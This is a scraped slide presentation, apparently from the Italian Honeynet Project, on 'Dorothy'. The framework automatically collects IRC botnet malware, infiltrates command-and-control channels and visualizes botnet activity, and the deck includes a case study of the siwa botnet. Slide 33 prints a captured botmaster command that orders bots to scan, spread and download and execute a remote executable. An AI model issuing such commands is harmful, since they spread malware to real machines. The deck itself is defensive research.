An Open Botnet Analysis Framework for An Open Botnet Analysis - - PowerPoint PPT Presentation

an open botnet analysis framework for an open botnet
SMART_READER_LITE
LIVE PREVIEW

An Open Botnet Analysis Framework for An Open Botnet Analysis - - PowerPoint PPT Presentation

Nov 18, 2023 33 likes •394 views

An Open Botnet Analysis Framework for An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization Automatic Tracking and Activity Visualization marco riccardi Italian Chapter - The Honeynet Project marco cremonini

slide-1
SLIDE 1

An Open Botnet Analysis Framework for An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization Automatic Tracking and Activity Visualization

marco riccardi – Italian Chapter - The Honeynet Project marco cremonini – Dept. of Information Technology – Università di Miliano

slide-2
SLIDE 2

 Defining the problem : IRC botnets  Defining the goal to achieve  The proposed solution: The Dorothy Framework  The Realized proof of concept: honey-dorothy  Results  Case study: siwa botnet  Workplan  Conclusions

slide-3
SLIDE 3

 Botnets are considered one of the most dangerous threat

  • Hard to keep pace with their evolutions
  • Hard to protect against their attacks
  • Hard to mitigate

 Time between Command and Center (C&C) identification and

botnet mitigation is tipically too long  Technical issues  Legal issues

slide-4
SLIDE 4

 Mitigation plan should be as quick as possible  Automation is required  …otherwise, human interaction is needed

  • Considering social context (legal, culture, etc)
  • All the contermeasures provided by ISP/LEO (blacklisting, dns

update,etc) are to be closely justified before its execution.

slide-5
SLIDE 5

 A mitigation plan should be as quick as possible  Automation is required  …otherwise, human interaction is needed

  • Considering social context (legal, economic, oprational, etc.)
  • All contermeasures provided by ISP/LEO (blacklisting, DNS

update,etc) must be clearly justified before their implementation

Developing a framework that automatically provide all information needed by an ISP/LEO to activate a mitigation strategy

slide-6
SLIDE 6

 Automated framework for IRC botnet analysis

  • Automatic Malware acquisition & analysis
  • Automatic C&C IRC channel infiltration
  • Automatic reporting activity status

 Interactive graphic front-end  Real time information about monitored C&Cs

  • Defenders can use these information to develop timely

countermeasures to mitigate the risks

 Customizable

  • Defenders could be alerted when a botnet activity is detected in

their network

slide-7
SLIDE 7

 Malware Collection

Module

 Virtual Honeypot

Injection Module

 Network Analysis

Module

 Data Extraction

Module

slide-8
SLIDE 8

 Infiltration Module  Geolocation Module  Live Data Extraction

Module

 Data Visualization

Module

 Web Graphical User

Interface

slide-9
SLIDE 9

 Proposed proof of concept  Developed using bash scripting language

  • Fully compatible with POSIX systems
  • Fully automatized

 Developed to be modular

  • Easy integration with other tools
  • Customizable

 90% of its components are open source

 The Virualization Module has been developed on VMware  A migration to VirtualBox is ongoing

slide-10
SLIDE 10

 Low interaction honeypots (nepenthes)  All honeypots upload their malwares to a central

malware repository

 Recently has been added

the support to the Mwcollect Alliance repository

 A malware analysis module (static/dynamic) integration

is ongoing.

slide-11
SLIDE 11

 The virtualization enviroment has been developed on VMware

enviroment  vmtools support the scripting implementation  The malware is executed on a virtual machine (Win XP SP2)  After three minutes the VM is reverted to its original snapshot

slide-12
SLIDE 12

 Inspect zombies network behavior during the three minutes of

infected VM execution

 The network traffic is sniffed by tcpdump tool  The output is stored into a dump file and sent to the next

module

slide-13
SLIDE 13

 The goal of this module is to extract all relevant information

about C&Cs

 Extracted information are used for botnet classification

  • C&C IP addresses
  • C&C Satellites
  • Hostname associated
  • Hostname resolved by DNS servers
slide-14
SLIDE 14

 Infiltrate, Observe, Report  IRC-drone

  • Full bash encoded
  • Multichannel support
  • Auto-respond to PING request
  • The drone injects all the IRC commands extracted from the

traffic generated by VM zombies as is.

 Compatible to non IRC-compliant C&C

 The connection toward the C&C is

anonymized through the TOR network

slide-15
SLIDE 15

 All the data received and sent to C&Cs are logged into

txt files

 Instant notification by email when :

  • Topic changement
  • New command issued by bot master
  • MODE option modification

 A full module re-engineerization is ongoing

  • Multiplatform
  • Support for more onion networks
slide-16
SLIDE 16

 Geolocation information give an approximated

geographical location of C&Cs

  • Can be useful to consider the social contex

 Useful for understanding which law officer notify

 Provided by GeoCityLite

 Free, good approximation

slide-17
SLIDE 17

 All log files generated by the IRC-drone are parsed

  • Topics extraction
  • Botmaster nickname/user host extraction
  • Time delay calculation

 Between each topic modification  Between each PING request (i.e. heartbeat)

slide-18
SLIDE 18

Parameter IPs Hosts Ports Zombies Malwares Chans Satellites ALL-Hosts Mail Addr

slide-19
SLIDE 19

Shape Color Circle Targets Circle C&C Circle Satellites Circle Spreading Circle Spam Square Services Triange Source

slide-20
SLIDE 20

Shape Color Circle Targets Circle C&C Circle Satellites Circle Spreading Circle Spam Square Services Triange Source

slide-21
SLIDE 21

Shape Color Circle Targets Circle C&C Circle Satellites Circle Spreading Circle Spam Square Services Triange Source

slide-22
SLIDE 22

“Overview first ,zoom and filter, then details on-demand”

  • B. Shneiderman. The eyes have it: A task by data type

taxonomy for information visualizations.

slide-23
SLIDE 23

 Tested for a period of 27 days between January and March

2009

 Two public IPs used for malware acquisition  3900 malware downloaded

  • 304 unique
  • 562,657 Mb downloaded

 16 unique C&C classified

  • 50 IRC channels monitored

 8992 unique pubblic IPs indentified as zombies

slide-24
SLIDE 24

 Formed by 5 C&C servers

  • 2 Located in China
  • 2 Located in Canada
  • 1 Located in Holland

 7 Different channel names used

  • #siwa was the most used

 37 different C&C satellites providing botnet updating service

through HTTP

 42 host names related to siwa IP addresses  4346 unique IP addesses identified as zombies

slide-25
SLIDE 25
slide-26
SLIDE 26

 Redesignment of the information flow management

  • Information repository stored into relational database

 Evaluate the developing of the core engine by means of other

programming languages

 Integration of a malware analysis module

  • Dynamical & Static analysis

 Virtual Honeypot: migration to VirtualBox

slide-27
SLIDE 27

 New module design and realization

  • A module for analyzing P2P botnets
  • A spam-trap implementation is ongoing

 Development of a new IRC Drone

  • Multiplatform, distribuited
slide-28
SLIDE 28

 Data visualization tuning

  • Investigating new ways for representing botnet data

 Developing a new web interface

  • More dynamic
  • Multi-user / user customizable

 Improve the notification process

  • Mailing list
  • Web 2.0 comunication channels

(twitter, feeds, blogs, ..)

slide-29
SLIDE 29

 The Dorothy Project is an ongoing activity of the Italian

Honeynet Project (IHP) Chapter

 Today, there are different countributors supporting the project:

  • Two reserchers of the University of Pavia are contributing by

integrating their own botnet analysis tools (H.I.V.E) with honey-doroty

  • Three students from the University of Milan are developing

new malware analysis modules

  • The IHP Chapter has ten active participants that are

contributing to the realization of a new version of the botnet analysis framework

slide-30
SLIDE 30

 The Dorothy Project is an ongoing activity of the Italian

Honeynet Project (IHP) Chapter

 Today, there are different countributors supporting the project:

  • Two reserchers of the University of Pavia are contributing by

integrating their own botnet analysis tools (H.I.V.E) with honey-doroty

  • Three students from the University of Milan are developing

new malware analysis modules

  • The IHP Chapter has ten active participants that are

contributing to the realization of a new version of the botnet analysis framework ….we hope to receive your supports too!

slide-31
SLIDE 31
slide-32
SLIDE 32

The Italian Honeynet Chapter – www.honeynet.it marco riccardi – marco.riccardi [at] honeynet [dot] it marco cremonini – marco.cremonini [at] unimi [dot] it

slide-33
SLIDE 33

 Botmaster execution request

##pi## :* ipscan s.s dcom2 -s ][ * wormride on -s ][ * download http://72.xxx.xxx.xxx/mb2.exe -e –s 72.xxx.xxx.xxx:2293 --> :QfNUXNcm!~xqbmgz@92.xxx.xxx.xxx PRIVMSG ##RUSSIA## :-041- Running FTP wormride thread 72.xxx.xxx.xxx:2293 --> :Tdkzdtwh!~bxoluj@mna75- 4-82-225-77-1.yyy.yyy.net PRIVMSG ##russia## :- 04wormride- 1. tftp transfer to 82.xxx.xxx.xxx complete

 Zombies response

slide-34
SLIDE 34
  • Pie chars

Number of DNS query

  • Bar chars

Number of DNS query executed by analized malware,grouped by C&C

slide-35
SLIDE 35
  • C&C heart-beat

Time avarege between two PING request

  • Topic activity

Time avarege between TOPIC changement

slide-36
SLIDE 36

 A full module re-engineering is ongoing  The new drone will be multiplatform

 Anyone can support the infiltration process

 It will support more than one onion network  It will send its log to a central log concentrator  Integrity and confidentiality have to

managed accurately